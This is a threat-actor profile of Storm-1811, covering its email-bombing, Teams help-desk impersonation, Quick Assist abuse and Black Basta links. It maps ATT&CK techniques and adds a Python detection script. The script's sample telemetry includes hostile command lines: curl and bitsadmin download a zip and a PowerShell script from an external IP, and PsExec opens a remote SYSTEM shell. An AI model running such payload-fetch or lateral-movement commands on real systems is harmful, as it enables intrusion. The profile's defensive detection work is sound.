
Threat Actor Characterization

Storm-1811

ID: 48b81b9a56420fb7886905f461c80d3557424
Cybercrime Cybercriminal Malware Dev
Threat types: Intrusion, Ransomware
Unknown
Updated: 2026-01-13
Created: 2025-10-22
Progress: 43% Completeness: 40% Freshness: 50%
Operation zone:
Aliases
No aliases registered.
MITRE ATT&CK®

Storm-1811 — financially motivated intrusions linked to Black Basta ransomware. Hallmarks: email-bombing to create urgency, IT/help-desk impersonation over Microsoft Teams/voice (vishing), abuse of Quick Assist and RMM tools, BITS/cURL ingress, Impacket/PsExec lateral movement, and selective ransomware deployment.


Technique ID | Technique name | Tactic
Evidence is listed under each technique (date, source, observation).

T1667 | Email Bombing | TA0040 (Impact)
  • 2024-05-10 — Rapid7 documents mailbox "email-bombing" used to prompt user contact with a fake IT/help desk.
  • 2025-03-14 — MITRE G1046 lists Email Bombing as a technique used by Storm-1811.
T1566.003 | Spearphishing via Service | TA0001 (Initial Access)
  • 2024-05-15 — Microsoft observed Storm-1811 using Microsoft Teams at the end of May 2024 to message/call targets while posing as the help desk.
  • 2025-03-14 — MITRE G1046 maps Storm-1811 to Spearphishing via Service (Teams).
T1566.004 | Spearphishing Voice | TA0001 (Initial Access)
  • 2024-05-15 — Microsoft and partners detail vishing/voice calls used to drive Quick Assist sessions.
  • 2024-12-02 — Red Canary shows a help-desk scam culminating in RMM deployment and Black Basta.
T1656 | Impersonation | TA0005 (Defense Evasion)
  • 2024-05-15 — Impersonation of IT/help desk and spoofed Teams account names to gain trust.
T1219.002 | Remote Desktop Software | TA0011 (Command and Control)
  • 2024-05-15 — Abuse of Quick Assist; subsequent use of legitimate remote-support tools (ScreenConnect, NetSupport, AnyDesk).
T1105 | Ingress Tool Transfer | TA0011 (Command and Control)
  • 2024-05-10 — BITSAdmin/cURL used to retrieve payloads and scripts post-access.
  • 2025-03-14 — MITRE G1046 lists Ingress Tool Transfer via BITSAdmin/cURL.
T1059.001 | PowerShell | TA0002 (Execution)
  • 2024-05-10 — PowerShell used extensively for staging, persistence, and configuration changes.
T1036.010 | Masquerade Account Name | TA0005 (Defense Evasion)
  • 2025-03-14 — Masquerade Account Name: IT/help-desk spoofed identities in Teams.
T1074.001 | Local Data Staging | TA0009 (Collection)
  • 2024-05-10 — Local staging of captured credentials prior to exfiltration.
T1048.002 | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | TA0010 (Exfiltration)
  • 2024-05-10 — Exfiltration via SCP in some incidents.
T1570 | Lateral Tool Transfer | TA0008 (Lateral Movement)
  • 2024-05-10 — Lateral tool transfer with Impacket; PsExec used for remote execution.
T1021.002 | SMB/Windows Admin Shares | TA0008 (Lateral Movement)
  • 2024-05-10 — SMB/Windows Admin Shares leveraged during lateral movement.
T1486 | Data Encrypted for Impact | TA0040 (Impact)
  • 2024-05-15 — Linkage to Black Basta ransomware deployment post-intrusion.
  • 2025-01-21 — Sophos reports at least one case ending with Black Basta.
T1585.003 | Cloud Accounts | TA0042 (Resource Development)
  • 2025-03-14 — Establish Cloud Accounts (malicious Microsoft 365/Teams tenants) to message targets and host payloads.
Strategic Intelligence
Last updated: 2025-10-22T21:56:20+00:00

Storm-1811 - Financially motivated intrusions


Executive Summary

Storm-1811 is a financially motivated intrusion set tracked by Microsoft and MITRE (G1046), frequently linked to Black Basta ransomware deployment. The group’s hallmark is a staged social-engineering playbook: overwhelm a user’s mailbox with non-malicious “email-bombing,” then impersonate internal IT via Microsoft Teams or voice calls to secure remote access (often through Quick Assist) and drop RMM tools, loaders, and post-exploitation frameworks. Public reporting also documents AiTM credential theft (e.g., EvilProxy), BITS jobs for tool transfer, and lateral movement culminating in ransomware execution. Overall technical sophistication is moderate but operationally effective due to strong social-engineering tradecraft and rapid “hands-on-keyboard” follow-through. Confidence: high for TTPs, medium for specific victim geographies and sector concentration (vendor-reported).


  • Motivation: Profit via data theft + encryption (double extortion) in support of, or overlapping with, Black Basta operations.
  • Operating model: Access-brokering and/or direct intrusion team using commodity tools, living-off-the-land, and legitimate collaboration platforms (Teams) as initial-access surfaces.
  • Branding: “Storm-1811” is a Microsoft tracking label; some third-party write-ups equate Storm-1811 with, or note overlap with, Black Basta operators or “Cardinal/UNC” designations; these mappings vary by vendor (treat cautiously). INFERENCE (confidence: low).
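The playbook described above (remote-assist session, then BITS/cURL tool ingress, then PsExec lateral movement) is distinctive mainly as a sequence on one host within a short window, not as any single event. As an added illustration for this profile, and not code from the profile, Microsoft, MITRE, or any cited vendor, the following Python correlates constructed endpoint process events into that chain. The process image names, the 30-minute window, the stage weights, and the sample telemetry are all assumptions chosen for the example.

```python
# Added example for this profile page: correlate constructed endpoint process
# events into the Storm-1811 access chain (remote-assist tool -> BITS/cURL
# ingress -> PsExec lateral movement). Process names, the 30-minute window,
# the stage weights and the sample events are assumptions for illustration.
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import List, Optional


@dataclass
class ProcEvent:
    host: str
    ts: datetime
    image: str      # process image name, e.g. "QuickAssist.exe"
    parent: str     # parent process image name
    cmdline: str


# Assumed image names for the tools named in the profile.
REMOTE_ASSIST = {"quickassist.exe", "screenconnect.clientservice.exe",
                 "anydesk.exe", "client32.exe"}          # client32 = NetSupport
INGRESS = {"bitsadmin.exe", "curl.exe"}
LATERAL = {"psexec.exe", "psexesvc.exe"}

# Assumed weight per stage; the chain scores higher the further it progresses.
WEIGHTS = {"remote_assist": 1, "shell_from_assist": 1, "ingress": 2, "lateral": 3}


def classify(ev: ProcEvent) -> Optional[str]:
    """Map one process event to a chain stage, or None if it is not of interest."""
    img, parent, cmd = ev.image.lower(), ev.parent.lower(), ev.cmdline.lower()
    if img in REMOTE_ASSIST:
        return "remote_assist"
    if img == "powershell.exe" and parent in REMOTE_ASSIST:
        return "shell_from_assist"
    if img in INGRESS and ("/transfer" in cmd or "http" in cmd):
        return "ingress"
    if img in LATERAL or parent in LATERAL:
        return "lateral"
    return None


def correlate(events, window: timedelta = timedelta(minutes=30)) -> List[dict]:
    """Return one finding per host where a remote-assist tool start is followed,
    within `window`, by tool ingress (the step that separates an ordinary
    help-desk session from the intrusion pattern). Lateral movement raises the score."""
    staged = defaultdict(list)
    for ev in sorted(events, key=lambda e: e.ts):
        stage = classify(ev)
        if stage:
            staged[ev.host].append((stage, ev))

    findings = []
    for host, seq in staged.items():
        for i, (stage, first) in enumerate(seq):
            if stage != "remote_assist":
                continue
            seen = {"remote_assist"}
            for later_stage, later in seq[i + 1:]:
                if later.ts - first.ts > window:
                    break
                seen.add(later_stage)
            if "ingress" in seen:
                findings.append({
                    "host": host,
                    "start": first.ts,
                    "stages": sorted(seen),
                    "score": sum(WEIGHTS[s] for s in seen),
                })
                break   # one finding per host is enough for triage
    return findings


def _t(hhmm: str) -> datetime:
    return datetime.fromisoformat(f"2025-01-21T{hhmm}:00")


# Constructed sample telemetry (not real incident data; 203.0.113.0/24 is a documentation range).
SAMPLE_EVENTS = [
    # WS-01: the full chain within 30 minutes of the Quick Assist session.
    ProcEvent("WS-01", _t("10:00"), "QuickAssist.exe", "explorer.exe", "QuickAssist.exe"),
    ProcEvent("WS-01", _t("10:05"), "powershell.exe", "QuickAssist.exe", "powershell -ep bypass"),
    ProcEvent("WS-01", _t("10:07"), "curl.exe", "powershell.exe", "curl http://203.0.113.10/a.zip -o a.zip"),
    ProcEvent("WS-01", _t("10:08"), "bitsadmin.exe", "cmd.exe",
              "bitsadmin /transfer j /download http://203.0.113.10/s.ps1 C:\\Users\\Public\\s.ps1"),
    ProcEvent("WS-01", _t("10:20"), "PsExec.exe", "cmd.exe", "PsExec.exe \\\\SRV-01 -s cmd"),
    # WS-02: a developer downloading with curl; no remote-assist session first.
    ProcEvent("WS-02", _t("11:00"), "curl.exe", "cmd.exe", "curl https://example.org/tool.zip -o tool.zip"),
    # WS-03: a genuine help-desk session with nothing following it.
    ProcEvent("WS-03", _t("12:00"), "QuickAssist.exe", "explorer.exe", "QuickAssist.exe"),
    # WS-04: ingress long after a remote-support session, outside the window.
    ProcEvent("WS-04", _t("13:00"), "AnyDesk.exe", "explorer.exe", "AnyDesk.exe"),
    ProcEvent("WS-04", _t("14:30"), "curl.exe", "cmd.exe", "curl http://203.0.113.10/x -o x"),
]

if __name__ == "__main__":
    for f in correlate(SAMPLE_EVENTS):
        print(f"{f['host']} score={f['score']} stages={f['stages']} start={f['start']:%H:%M}")
```

Only WS-01 produces a finding: the curl-only host, the help-desk session with no follow-on activity, and the host whose download falls outside the window are all left alone, which is the point of keying the rule on the sequence rather than on any one tool. In production the same logic would read Sysmon or EDR process-creation events, and the window and tool list would be tuned to what the organisation's own help desk actually uses.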
Social Media & Communication

No social links registered for this profile.
Reference Images / Associated Evidence

No images found for this threat.